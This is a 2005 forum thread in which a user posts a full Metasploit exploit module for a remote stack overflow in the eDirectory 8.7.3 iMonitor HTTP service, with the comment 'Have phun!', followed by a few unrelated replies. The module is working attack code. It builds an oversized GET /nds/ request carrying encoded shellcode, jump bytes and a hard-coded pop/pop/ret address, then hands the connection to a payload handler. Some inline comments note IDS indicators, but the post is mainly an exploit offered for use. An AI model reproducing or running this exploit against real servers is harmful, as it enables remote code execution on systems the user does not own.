machinamedia 0 Report post Posted August 21, 2005 Here's the advisory: http://imp.ovh.net/fr/

# Metasploit Framework (Perl-era) exploit module for a stack overflow in the
# eDirectory 8.7.3 iMonitor HTTP service. The only reference the module gives
# is BID 14548; affected builds and vendor fixes have to be taken from there.
#
# What the request looks like on the wire (all read off Exploit() below):
#   * one HTTP/1.1 GET to the iMonitor listener (RPORT defaults to 8008),
#     optionally wrapped in SSL;
#   * a request path of "/nds/" followed by several kilobytes of binary data
#     ('Space' is 0x1036 bytes for the payload alone) and ending in a run of
#     0xD0 (208) "B" characters;
#   * fixed headers: "Accept: */*", an MSIE 6.0 User-Agent, a Host header built
#     from RHOST:RPORT, and "Connection: Close".
# An oversized, non-printable path under /nds/ is the strongest indicator for
# logging or IDS rules; the User-Agent is a common browser string and is weak
# on its own. Limiting who can reach the iMonitor port reduces exposure.
package Msf::Exploit::edirectory_imonitor;
use strict;
use base "Msf::Exploit";
use Pex::Text;

# No advanced options are defined for this module.
my $advanced = { };

# Module metadata handed to the framework through new().
my $info =
{
    'Name'    => 'eDirectory 8.7.3 iMonitor Remote Stack Overflow',
    'Version' => '$Revision: 1.1 $',
    'Authors' =>
    [
        'Anonymous',
    ],
    'Arch'    => [ 'x86' ],
    'OS'      => [ 'win32', 'winxp', 'win2k', 'win2003' ],
    'Priv'    => 1,
    'AutoOpts' =>
    {
        'EXITFUNC' => 'thread'
    },
    # Each entry is [required flag, type, description, optional default].
    # VHOST is declared here but Exploit() below never reads it: the Host
    # header is always RHOST:RPORT.
    'UserOpts' =>
    {
        'RHOST' => [1, 'ADDR', 'The target address'],
        'RPORT' => [1, 'PORT', 'The target port', 8008 ],
        'VHOST' => [0, 'DATA', 'The virtual host name of the server'],
        'SSL'   => [0, 'BOOL', 'Use SSL'],
    },
    # Constraints the framework applies when encoding the payload: maximum
    # size, and bytes that must not appear because the payload travels inside
    # an HTTP request path.
    'Payload' =>
    {
        'Space'    => 0x1036,
        'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c&=+?:;-,/#.\\$%",
        'Keys'     => ['+ws2ord'],
    },
    'Description' => Pex::Text::Freeform(qq{This module exploits a stack overflow in eDirectory 8.7.3 iMonitorservice.}),
    'Refs' =>
    [
        ['BID', 14548],
    ],
    # Each target is [label, address]. The address is a single hard-coded
    # value, so the module depends on that exact module image being loaded.
    'Targets' =>
    [
        [ 'Windows (all versions) - eDirectory 8.7.3 iMonitor', 0x63501f15] # pop/pop/ret
    ],
    'Keys' => ['imonitor'],
};

# Constructor: passes the metadata above to the Msf::Exploit base class.
sub new {
    my $class = shift;
    my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
    return($self);
}

# Builds and sends the single overflow request, then hands the socket to the
# framework's payload handler. Returns nothing; a socket error is printed and
# ends the attempt early.
sub Exploit {
    my $self = shift;
    my $target_host = $self->GetVar('RHOST');
    my $target_port = $self->GetVar('RPORT');
    my $target_idx  = $self->GetVar('TARGET');
    my $shellcode   = $self->GetVar('EncodedPayload')->Payload;
    my $target = $self->Targets->[$target_idx];

    $self->PrintLine( "[*] Attempting to exploit " . $target->[0] );

    my $s = Msf::Socket::Tcp->new
    (
        'PeerAddr' => $target_host,
        'PeerPort' => $target_port,
        'SSL'      => $self->GetVar('SSL'),
    );

    if ( $s->IsError ) {
        $self->PrintLine( '[*] Error creating socket: ' . $s->GetError );
        return;
    }

    # Layout of the overlong path component, in order:
    #   encoded payload | 2 x NOP + short jump over the next 4 bytes |
    #   target address as a little-endian 32-bit value (pop/pop/ret in
    #   ndsimon.dlm) | near jump with a negative displacement, i.e. back
    #   towards the start of the buffer | 0xD0 bytes of "B" filler.
    # NOTE(review): a pop/pop/ret address placed like this is the usual shape
    # of an exception-handler overwrite; the module does not say so - confirm
    # against the advisory.
    my $req = $shellcode . "\x90\x90\xeb\x04" . pack('V', $target->[1]) .
              "\xe9\xbd\xef\xff\xff" .
              ("B" x 0xD0);

    # The whole buffer is sent as the URI after /nds/, which is why the bad
    # character list above excludes URL delimiters.
    my $request =
        "GET /nds/$req HTTP/1.1\r\n".
        "Accept: */*\r\n".
        "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n".
        "Host: $target_host:$target_port\r\n".
        "Connection: Close\r\n".
        "\r\n";

    $s->Send($request);

    $self->PrintLine("[*] Overflow request sent, sleeping for four seconds");
    # Four-second pause (select with no handles acts as a sleep).
    select(undef, undef, undef, 4);

    $self->Handler($s);
    return;
}

1;

Have phun! Share this post Link to post Share on other sites
melkonianarg Posted August 22, 2005 Ooooo, nasty...hope that has not caused you any problems...
machinamedia Posted August 23, 2005
> Ooooo, nasty...hope that has not caused you any problems...

What exactly do you mean?
melkonianarg Posted August 23, 2005 Well, do you run one of these servers? Have you been remotely accessed through a network? Does this security threat have any relevance to you?
machinamedia Posted August 23, 2005
> Well, do you run one of these servers? Have you been remotely accessed through a network? Does this security threat have any relevance to you?

I thought you were saying that the post caused me problems... That's it! Sorry if you feel so irritated by a simple question and you answer in that sarcastic tone. Next time better don't answer... It's same!